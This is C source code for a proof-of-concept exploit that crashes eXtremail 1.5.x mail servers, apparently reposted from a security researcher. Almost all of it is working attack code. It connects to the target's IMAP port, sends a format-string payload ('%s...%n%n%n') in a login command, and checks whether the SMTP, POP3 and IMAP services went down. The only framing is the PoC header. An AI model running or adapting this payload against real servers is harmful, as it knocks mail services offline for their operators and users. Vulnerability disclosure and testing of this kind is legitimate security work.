/**********************************************
* Proof of Concept *
* eXtremail 1.5.x Denial of Service *
* *
* Luca Ercoli <luca.e [at] seeweb.com> *
* Seeweb http://www.seeweb.com *
* *
***********************************************/#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 143
#define MAXRECVSIZE 100
int main(int argc, char *argv[]);
void crash(char *host,int TYPE);
int numbytes;
void crash(char *host,int TYPE)
{
int sockfd;
char buf[MAXRECVSIZE];
struct hostent *he;
struct sockaddr_in their_addr;
char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";
if ((he=gethostbyname(host)) == NULL)
{
perror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) ==
-1)
{
perror("connect");
exit(1);
}
if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
{
perror("recv");
exit(1);
}
buf[numbytes] = '\0';
if (TYPE == 0)
{
printf("[+] Server -> %s",buf);
sleep(1);
printf("\n[!] Sending malicious packet...\n");
send(sockfd,poc, strlen(poc), 0);
sleep(1);
printf ("\n[+] Sent!\n");
}
close(sockfd);
}
int main(int argc, char *argv[])
{
printf("\n\n eXtremail 1.5.x Denial of Service \n");
printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");
if (argc != 2)
{
fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
exit(1);
}
crash(argv[1],0);
numbytes=0;
printf ("\n[+] Checking server status ...\n");
if(!fork()) crash(argv[1],1);
sleep(5);
if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");
return 0;
}
推荐
评论(0条)
